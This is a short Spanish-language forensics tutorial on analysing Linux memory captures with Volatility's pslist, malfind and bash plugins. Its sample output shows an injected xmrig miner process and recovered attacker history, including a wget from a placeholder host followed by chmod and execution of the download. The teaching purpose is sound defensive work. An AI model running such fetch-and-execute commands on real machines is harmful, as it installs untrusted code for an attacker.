DFIR
Análisis de memoria
La memoria RAM guarda la verdad que el disco esconde: procesos ocultos, conexiones, y hasta los comandos que el atacante escribió.
Volatility la analiza. pslist te da los procesos que estaban vivos al capturar.
netstat, las conexiones. malfind busca código inyectado en memoria.
Y el módulo bash, una joya, te reconstruye el historial de comandos del atacante. Captura la memoria antes de apagar el equipo, o pierdes todo esto.
# los comandos
analyst@dfir:~# vol -f mem.raw linux.pslistcopiar1876 xmrig
1901 bash
1544 sshd
analyst@dfir:~# vol -f mem.raw linux.malfindcopiarPID 1876 xmrig RWX injected region
analyst@dfir:~# vol -f mem.raw linux.bashcopiar1901 bash wget http://evil.co/x
1901 bash chmod +x x; ./x